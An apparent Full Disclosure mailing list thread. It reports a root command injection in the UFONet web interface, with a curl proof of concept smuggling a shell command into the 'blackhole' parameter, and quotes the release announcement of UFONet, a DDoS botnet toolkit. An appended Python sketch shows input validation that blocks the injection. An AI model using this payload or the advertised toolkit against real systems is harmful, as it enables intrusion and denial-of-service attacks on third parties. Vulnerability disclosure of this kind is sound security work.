Date: Fri, 16 Jul 2021 14:43:41 +0200
From: psy <epsylon@...eup.net>
To: Pierre Kim <pierre.kim.sec@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] New Release: UFONet v1.7 - "KRäK!eN"...



On 16/7/21 13:06, Pierre Kim wrote:
> Hi,

Hi UFOmmander!

> Attention to all motherships, borgs have been detected inside a
> blackhole. Brace yourself for the impact:
> 
>     $ curl "http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'"
>     $ cat /tmp/plop
>     uid=0(root) gid=0(root) groups=0(root)
> 
> Energy shield levels critical! Enemies detected on the deck. Immediate
> response needed!

Hahahaha.... That teleportation technology can be exploited by many
alien races in the galaxy, yes, but it will depend a lot on the pilot
experiences and on the environment in which the aircraft has been built.

Some use transparent proxies to avoid going further in those techniques...

"""
$ curl "http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
  <title>503 - Forwarding failure (Privoxy@...alhost)</title>
"""

Others simply do not launch the tool using the privileged user (root),
knowing that UFONet is designed to prompt you when required, for example
when creating certain network packages ...

> Can you request a CVE ?

Ahhaha, I don't think so...but, when to send the solution with the piece
of code already fixed?..

Ouch! {troll}

> Best regards,

Thank you very much for the report and for doing it in such a funny
tone... ;-)

> - Captain Alex Torres and Pilot Pierre Kim

Roger! I will work on it!

> On 7/15/21, psy <epsylon@...eup.net> wrote:
>> Hi Community,
>>
>> I am glad to present a new release of this tool:
>>
>>   - https://ufonet.03c8.net
>>
>> ---------
>>
>> "UFONet is a free software, P2P and cryptographic -disruptive toolkit-
>> that allows to perform DoS and DDoS attacks; on the Layer 7 (APP/HTTP)
>> through the exploitation of Open Redirect vectors on third-party
>> websites to act as a botnet and on the Layer3 (Network) abusing the
>> protocol."
>>
>> "It also works as an encrypted DarkNET to publish and receive content by
>> creating a global client/server network."
>>
>> ---------
>>
>> Main options are:
>>
>>   * DDoS (botnet) + DoS
>>   * Auto-update
>>   * Clean code
>>   * Documentation with examples
>>   * Web/GUI Interface
>>   * Proxy to connect to 'zombies' (ex: tor)
>>   * Change HTTP Headers (User-Agent, Referer, Host...)
>>   * Configure requests (Timeout, Retries, Delay, Threads...)
>>   * Search for 'zombies' on different search engines
>>   * Test vulnerabilities on 'zombies'
>>   * Download/Upload 'zombies' from/to others
>>   * Inspect a target (HTML objects sizes)
>>   * Set a place to 'bite' on a target (ex: big file)
>>   * Control number of rounds to attack
>>   * Apply cache evasion techniques
>>   * Advanced queries (ex: Verb tunneling exploitation)
>>   * Supports GET/POST
>>   * Multithreading
>>   * Order 'zombies' to attack you for benchmarking
>>   * Geomapping / Visual data
>>   * [...]
>>
>> This release (v1.7) called "/KRäK!eN/" has added these new features:
>>
>>   * Bugfixing
>>   * Added: "Deploy"
>>   * Added: "SHIP.TV"
>>   * Added: "Nodes"
>>   * Modified/Updated: Web/GUI
>>   * Updated Documentation
>>   * Updated FAQ (offline/online)
>>   * Updated Website
>>   * [...]
>>
>> ---------
>>
>> FAQ:
>>
>>   - https://ufonet.03c8.net/FAQ.html
>>
>> ---------
>>
>> Packages:
>>
>>   * [source]:
>>
>>   - https://code.03c8.net/epsylon/ufonet
>>
>>   * [mirror]:
>>
>>   - https://github.com/epsylon/ufonet
>>
>>   * [.zip]:
>>
>>   - https://ufonet.03c8.net/ufonet/ufonet-v1.7.zip
>>
>>   * [.tar.gz]:
>>
>>   - https://ufonet.03c8.net/ufonet/ufonet-v1.7.tar.gz
>>
>> -------------------------
>>
>> MEDIA:
>>
>>   * [Video] [07.2021] UFONet - "/KRäK!eN/":
>>
>>   - https://ufonet.03c8.net/ufonet/ufonet-kraken.ogv
>>
> 
> 


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
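
Added example, not part of the original message and not UFONet's own code: one way a handler could treat the `blackhole` query parameter from the request quoted in the report, accepting only an IP literal and handing it to a child process as a single argv element instead of through a shell. That the parameter is meant to hold an IP address is an assumption drawn from the endpoint name; `parse_blackhole`, `helper_argv`, `handle` and the echoing child process are hypothetical.

```python
import ipaddress
import subprocess
import sys
from urllib.parse import parse_qs, urlsplit

PARAM = "blackhole"  # parameter name taken from the request in the report


def parse_blackhole(url):
    """Return the 'blackhole' value as a canonical IP string, or raise ValueError."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(PARAM, [])
    if len(values) != 1:
        raise ValueError("expected exactly one %r parameter" % PARAM)
    addr = ipaddress.ip_address(values[0])  # ValueError unless an IP literal
    # IPv6 zone ids ("fe80::1%eth0") are free-form text, so refuse them.
    if getattr(addr, "scope_id", None):
        raise ValueError("scoped IPv6 addresses are not accepted")
    return str(addr)


def helper_argv(ip):
    """Build the argv list for the child process.

    The child is a stand-in (an assumption for this sketch): it echoes
    its argument, where a real handler would start its download step.
    """
    return [sys.executable, "-c", "import sys; print(sys.argv[1])", ip]


def handle(url):
    """Validate first, then run the helper with no shell in between."""
    argv = helper_argv(parse_blackhole(url))
    done = subprocess.run(argv, shell=False, capture_output=True,
                          text=True, check=True)
    return done.stdout.strip()


if __name__ == "__main__":
    base = "http://localhost:9999/cmd_download_botnet_ip?blackhole="
    # Constructed inputs: one valid address, then the value from the report.
    for value in ("192.0.2.10", "';id>/tmp/plop;'"):
        try:
            print("accepted:", handle(base + value))
        except ValueError as exc:
            print("rejected:", exc)
```
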